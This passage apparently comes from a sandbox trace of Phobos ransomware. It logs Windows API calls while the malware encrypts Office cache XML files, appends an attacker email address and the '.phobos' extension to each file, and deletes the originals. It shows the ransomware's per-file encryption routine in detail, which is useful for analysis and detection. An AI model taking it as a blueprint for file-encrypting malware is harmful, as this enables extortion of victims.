lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5b0, lpOverlapped=0x0) returned 1 [0138.239] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e850) returned 1 [0138.239] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.239] CryptEncrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0138.239] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.239] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0138.239] CryptDestroyKey (hKey=0xa2e408) returned 1 [0138.239] CloseHandle (hObject=0x124) returned 1 [0138.239] CloseHandle (hObject=0x138) returned 1 [0138.240] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0138.240] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0138.240] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0138.241] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1872) returned 1 [0138.241] CloseHandle (hObject=0x138) returned 1 [0138.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0138.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0138.242] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0138.242] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.242] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.242] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0138.242] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0138.243] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.243] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x750, lpOverlapped=0x0) returned 1 [0138.266] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x760, dwBufLen=0x760 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x760) returned 1 [0138.266] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x760, lpOverlapped=0x0) returned 1 [0138.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e850) returned 1 [0138.267] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.267] CryptEncrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0138.267] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.267] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0138.267] CryptDestroyKey (hKey=0xa2e408) returned 1 [0138.267] CloseHandle (hObject=0x138) returned 1 [0138.267] CloseHandle (hObject=0x124) returned 1 [0138.268] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0138.269] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0138.269] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0138.270] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=913) returned 1 [0138.270] CloseHandle (hObject=0x124) returned 1 [0138.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020 [0138.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0138.270] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0138.270] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.270] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.271] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0138.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0138.271] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.271] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x391, lpOverlapped=0x0) returned 1 [0138.552] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a0, dwBufLen=0x3a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a0) returned 1 [0138.552] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3a0, lpOverlapped=0x0) returned 1 [0138.553] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e850) returned 1 [0138.554] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.554] CryptEncrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0138.554] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.554] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0138.554] CryptDestroyKey (hKey=0xa2e408) returned 1 [0138.554] CloseHandle (hObject=0x124) returned 1 [0138.554] CloseHandle (hObject=0x138) returned 1 [0138.555] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0138.556] ResetEvent (hEvent=0x108) returned 1 [0138.556] SetEvent (hEvent=0x10c) returned 1 [0138.556] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0138.556] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0138.556] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1452) returned 1 [0138.556] CloseHandle (hObject=0x138) returned 1 [0138.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0138.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0138.556] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0138.557] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.557] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.557] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0138.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0138.557] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.557] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5ac, lpOverlapped=0x0) returned 1 [0138.702] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b0) returned 1 [0138.702] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5b0, lpOverlapped=0x0) returned 1 [0138.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e850) returned 1 [0138.703] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.703] CryptEncrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0138.703] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.703] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0138.703] CryptDestroyKey (hKey=0xa2e408) returned 1 [0138.703] CloseHandle (hObject=0x138) returned 1 [0138.703] CloseHandle (hObject=0x124) returned 1 [0138.704] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0138.705] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0139.056] ResetEvent (hEvent=0x108) returned 1 [0139.056] SetEvent (hEvent=0x10c) returned 1 [0139.056] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.056] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.057] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=596341) returned 1 [0139.057] CloseHandle (hObject=0x138) returned 1 [0139.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020 [0139.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.058] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.058] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.058] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.058] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.059] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa28ec8) returned 1 [0139.059] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.059] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91975, lpOverlapped=0x0) returned 1 [0139.287] CryptEncrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91980, dwBufLen=0x91980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91980) returned 1 [0139.294] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x91980, lpOverlapped=0x0) returned 1 [0139.307] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e4d8) returned 1 [0139.307] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.307] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0139.307] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0139.307] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0139.307] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0139.307] CloseHandle (hObject=0x138) returned 1 [0139.307] CloseHandle (hObject=0x148) returned 1 [0139.313] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0139.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.323] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.323] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5557) returned 1 [0139.323] CloseHandle (hObject=0x148) returned 1 [0139.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020 [0139.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.324] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.324] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.324] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.324] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.324] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.324] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x15b5, lpOverlapped=0x0) returned 1 [0139.379] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15c0, dwBufLen=0x15c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15c0) returned 1 [0139.379] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x15c0, lpOverlapped=0x0) returned 1 [0139.380] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32828) returned 1 [0139.380] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.381] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0139.381] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.381] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0139.381] CryptDestroyKey (hKey=0xa327e8) returned 1 [0139.381] CloseHandle (hObject=0x148) returned 1 [0139.381] CloseHandle (hObject=0x138) returned 1 [0139.381] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0139.383] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: 